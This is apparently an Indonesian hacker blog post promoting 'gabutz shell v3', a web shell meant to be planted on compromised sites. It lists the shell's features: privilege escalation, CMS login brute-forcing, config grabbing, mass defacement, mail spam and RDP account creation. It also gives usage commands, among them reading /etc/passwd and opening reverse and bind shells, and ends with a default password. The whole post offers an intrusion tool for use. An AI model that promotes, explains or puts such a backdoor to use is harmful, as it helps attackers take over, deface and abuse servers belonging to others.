Hay guys udah lama ga update hehe..
oke guys kali ini cakil akan share gabutz shell v3 untuk fiture nya bisa kalian
liat sendiri ok oc

what it's new ?
-spawn anon(anonghost shell)
-localroot (auto root with perl)
-joomla brute force
-spawn uploader with txt
-spawn noname
-lokomedia + auto login + upload shell
-balitbang 3.5.3 (beta)
-cms popoji add admin
-sql scanner vulnerability
-streaming nekopoi
-streaming brazzer
-port scanner
-wordpress brute force
-wp auto hijack
-encode/decode
-Mail Spam
-zip menu
-full bypass
-bypass vhost
-bypass disable functions
-shell finder
-auto edit title wordpress
-Injection C0de
-domain viewer
-joomla brute force
-about me
-contact me
-music
fiture
=============================================
**** COMMAND BASED *****
- Read File
usage: rf [filename]
example: rf /etc/passwd

- Spawn File/Tools
usage: spawn [name]

[name]
- Adminer (adminer)
- WebConsole (webconsole)
- CGI Telnet 1 (cgitelnet1)
- CGI Telnet 2 (cgitelnet2)
- PHPINFO (phpinfo)
-webdav(webdav)
-adfin (admin finder)
- elfinder (elfinder exploiter)
-kcfinder (kcfinder exploiter)
-csrf (csrf exploiter)
-files(files.1337) buat scanner files
-scn(scanner for python)
-gabutz2 (gabutz shell v1)
-gabutz1 (mini shell from gabutz shell v1)
-galau (galau shell v2 from 99syndicate)
-uploader txt
-anon (anonGhost shell)
-lokomedia + upload shell + auto login
-balitbang
-video (streaming nekopoi.brazzer)
-noname shell
-popoji add admin
-sql scanner vulnerability

example:
spawn adminer
spawn webconsole
spawn cgitelnet1
spawn webdav
spawn adfin
spawn elfinder
spawn kcfinder
spawn csrf
spawn gabutz1
spawn gabutz2
spawn galau
spawn scn
spawn files
spawn anon
spawn uploader
spawn video
spawn balitbang
spawn lokomedia
spawn popoji
spawn noname

- scanner
usage :
spawn scn
spawn files
spawn webconsole
isi
python scanner.py http://*lusuka.coli -m files (enter)

- Jumping
usage: jumping

- Config Grabber
usage: gabutsconfig

- Symlink
usage: symlink

- Reverse Shell
[Back Connect]
usage: rvr bc [IP] [PORT] [TYPE]
example:
rvr bc 127.0.0.1 1337 bash
rvr bc 127.0.0.1 1337 perl

[Bind Port]
usage: rvr bp [PORT] [TYPE]
example:
rvr bp 1337 perl

- KRDP - Create RDP Account (for windows server only)
usage: krdp

- Logout From Shell
usage: logout

- Kill Backdoor
usage: killme
=============================================
- Mass Password Change
- Fake Root
- Cpanel Crack
- Mass Deface/Delete File
- Zone-H Mass Submit
-joomla brute force
-localroot
-port scanner
-wordpress brute force
-wp auto hijack
-encode/decode
-Mail Spam
-zip menu
-full bypass
-bypass vhost
-bypass disable functions
-shell finder
-auto edit title wordpress -Injection C0de
-domain viewer
-joomla brute force
-about me
-contact me
-music
link ? Disini gan
size ? 167b (0.167kb)


default pass: mrcakil1234
pass ? di atas tulisan mrcakil
gmna ? gud bukan kwkwkwkkw
oke sekian dan terima kasih